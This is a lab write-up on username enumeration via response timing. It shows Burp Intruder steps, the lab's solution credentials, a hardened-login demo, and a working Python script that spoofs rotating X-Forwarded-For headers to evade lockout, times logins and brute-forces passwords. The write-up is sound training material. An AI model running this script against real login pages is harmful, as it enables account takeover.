Username enumeration via response timing
This lab is vulnerable to username enumeration using its response times.
Intercepting a login request with invalid credentials, we can see that the server takes a moment to respond. After a certain number of failed attempts it returns
`You have made too many incorrect login attempts. Please try again in 30 minute(s).` This tells us the server has some sort of brute-force protection in place, in this case a lockout keyed on the client's IP address.
A handful of HTTP headers are commonly trusted by servers and reverse proxies as the source of the client IP, and any of them may help bypass an IP-based filter.
Adding an `X-Forwarded-For` header with an arbitrary value bypasses the lockout here, and we get a normal response again. The value has to change on every request, though: once a given value has accumulated its own share of failures it gets locked out too, so a brute-force attack must keep rotating the header.
Additionally, I noticed that the server takes longer to respond to a request containing the right username and a long wrong password, but responds almost instantly to a request with a wrong username and the same long wrong password.
This implies the server validates the username first and only processes the password, the expensive step, once the username is known to exist. We can abuse this for username enumeration by sending requests with a very long password alongside our username list: a wrong username gets a quick response, while the right one gets a slow response that confirms it. The password should be long enough that the delay clearly stands out from ordinary network jitter; if a result looks ambiguous, send that candidate a couple more times. Pretty cool ngl!
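To make the root cause concrete, here is an added Python example (not the lab's own code) of the vulnerable login pattern beside a hardened version. The user store, salt and PBKDF2 parameters are constructed for the demo. The vulnerable check only hashes the submitted password when the username exists, which is exactly the work-skipping that produces the timing oracle; the hardened check always does the same hash work and a constant-time comparison whether or not the user exists. The difference is counted as hash invocations rather than timed with a clock, so the demonstration is deterministic; the lab's own slowdown grows with password length, which this hash does not reproduce.

```python
import hashlib
import hmac
import secrets

# Constructed user store for the demo (assumption, not the lab's real backend).
_SALT = b"constructed-salt"
_ITERATIONS = 200_000
_hash_calls = 0  # counts every password hash performed, for checking without a clock


def _hash(password: str, salt: bytes = _SALT) -> bytes:
    """Slow password hash; this is the work that makes the timing observable."""
    global _hash_calls
    _hash_calls += 1
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, _ITERATIONS)


USERS = {"applications": _hash("monitor")}

# Random dummy hash to compare against when the username does not exist.
_DUMMY = _hash(secrets.token_hex(16))


def login_vulnerable(username: str, password: str) -> bool:
    """Checks the username first and only hashes when it exists.

    An unknown username returns before any hashing, so it answers quickly;
    a valid username pays the full hash cost. That gap is the oracle.
    """
    stored = USERS.get(username)
    if stored is None:
        return False
    return hmac.compare_digest(_hash(password), stored)


def login_hardened(username: str, password: str) -> bool:
    """Does identical work for known and unknown usernames.

    The password is always hashed and compared (against a dummy hash when the
    user is missing), so response time no longer depends on username validity.
    """
    stored = USERS.get(username, _DUMMY)
    matched = hmac.compare_digest(_hash(password), stored)
    return matched and username in USERS


def hash_work(login_fn, username: str, password: str) -> int:
    """Return how many password hashes a single login attempt triggered."""
    before = _hash_calls
    login_fn(username, password)
    return _hash_calls - before


if __name__ == "__main__":
    long_pw = "A" * 500
    for fn in (login_vulnerable, login_hardened):
        for user in ("nobody", "applications"):
            print(f"{fn.__name__:17} {user:13} hashes={hash_work(fn, user, long_pw)}")
```

Run it and the vulnerable function reports zero hashes for `nobody` and one for `applications`, while the hardened function reports one for both; the hardened version is what removes the enumeration vector the lab relies on.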
Now that we understand what goes on in the background, we can move on to enumerating usernames. Send the request to Intruder, add an `X-Forwarded-For` header and mark its value as the first payload position, mark the
`username` field as the second position, set the password to any long value, and switch the attack type to
`Pitchfork`, so that both positions advance together and every request gets a fresh header value.
Under the Payloads tab, select payload set 1 and set the payload type to
`Numbers`. This payload set is what iterates the
`X-Forwarded-For` value. Under payload options, set the following (note that 10 to 100 gives 91 values, and a Pitchfork attack stops when the shorter list runs out, so the username list must not be longer than that).
Type = Sequential
From = 10
To = 100
Base = Decimal
Max Fraction Digits = 0
Next select payload set 2 and paste in the username list. Once done, hit Start attack and wait for it to complete.
Meanwhile, enable the
`Response received` and
`Response completed` columns in the attack window (Columns menu) for analysis once the attack finishes.
Sorted by Response received, there is, as suspected, one request that yielded a noticeably slower response from the server. The username is
`applications`.
username = applications
Now that we have the username, we can drop the long-password trick and rerun the attack with just the
`X-Forwarded-For` increment to bypass the lockout.
Set the username to `applications`, shorten the password to a normal value and mark the password field as the second position instead of the username field.
Replace the list under payload set 2 with the password list and hit Start attack.
Once the attack is complete, exactly one request comes back with status code
`302`, the redirect issued after a successful login, unlike the failed attempts, which all return the login page again 😉
The password is the payload of that request.
password = monitor
Username = applications
Password = monitor
Logging in with these credentials solves the lab!
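The same two stages scripted outside Burp, as an added Python example that is not part of the original write-up: rotate `X-Forwarded-For` on every request, time a long-password login for each candidate username, pick the one whose response time is an outlier, then brute-force its password and stop on the first `302`. The lab URL, the wordlists and the outlier factor are assumptions; the header values are generated as IP-looking strings, though the lab accepts any distinct value (the write-up uses plain numbers). Redirects are deliberately not followed so the `302` stays visible.

```python
import itertools
import statistics
import sys
import time
import urllib.error
import urllib.parse
import urllib.request

# Assumption: replace with your own lab instance.
LAB_URL = "https://YOUR-LAB-ID.web-security-academy.net/login"

# Constructed wordlists for the demo; the lab ships its own candidate lists.
USERNAMES = ["admin", "test", "applications", "root", "guest"]
PASSWORDS = ["123456", "password", "monitor", "letmein"]


class _NoRedirect(urllib.request.HTTPRedirectHandler):
    """Refuse to follow redirects so a 302 surfaces as an HTTPError we can read."""

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        return None


def xff_values(start: int = 10):
    """Yield a fresh X-Forwarded-For value per request (10.0.0.10, 10.0.0.11, ...).

    The lockout is keyed on this header, so never reuse a value within an attack.
    """
    for n in itertools.count(start):
        yield f"10.{(n >> 16) & 255}.{(n >> 8) & 255}.{n & 255}"


def timed_login(url: str, username: str, password: str, xff: str, timeout: float = 10):
    """POST one login attempt; return (elapsed_seconds, status_code)."""
    body = urllib.parse.urlencode({"username": username, "password": password}).encode()
    req = urllib.request.Request(
        url, data=body, method="POST",
        headers={"X-Forwarded-For": xff,
                 "Content-Type": "application/x-www-form-urlencoded"},
    )
    opener = urllib.request.build_opener(_NoRedirect())
    start = time.perf_counter()
    try:
        status = opener.open(req, timeout=timeout).status
    except urllib.error.HTTPError as err:  # 302 and 4xx land here
        status = err.code
    return time.perf_counter() - start, status


def pick_slow_outlier(timings: dict, factor: float = 3.0):
    """Return the single candidate whose time exceeds factor * median, else None.

    Using the median rather than the minimum keeps one jittery fast response
    from masking the real outlier; None means the result is ambiguous.
    """
    median = statistics.median(timings.values())
    slow = [name for name, t in timings.items() if t > median * factor]
    return slow[0] if len(slow) == 1 else None


def enumerate_usernames(url: str, usernames, long_password: str = "A" * 500):
    """Stage 1: time a long-password attempt per username, return (hit, timings)."""
    xff = xff_values(10)
    timings = {u: timed_login(url, u, long_password, next(xff))[0] for u in usernames}
    return pick_slow_outlier(timings), timings


def brute_force_password(url: str, username: str, passwords):
    """Stage 2: try each password with a fresh header; 302 means success."""
    xff = xff_values(10_000)  # disjoint range from stage 1
    for candidate in passwords:
        _, status = timed_login(url, username, candidate, next(xff))
        if status == 302:
            return candidate
    return None


if __name__ == "__main__":
    url = sys.argv[1] if len(sys.argv) > 1 else LAB_URL
    user, timings = enumerate_usernames(url, USERNAMES)
    for name, t in sorted(timings.items(), key=lambda kv: kv[1]):
        print(f"{name:15} {t:.3f}s")
    if user is None:
        sys.exit("no clear timing outlier; rerun with a longer password or more samples")
    password = brute_force_password(url, user, PASSWORDS)
    print(f"username={user} password={password}")
```

If no single username stands out, the script exits rather than guessing; repeat the timing stage with a longer password or average several samples per candidate before trusting the result.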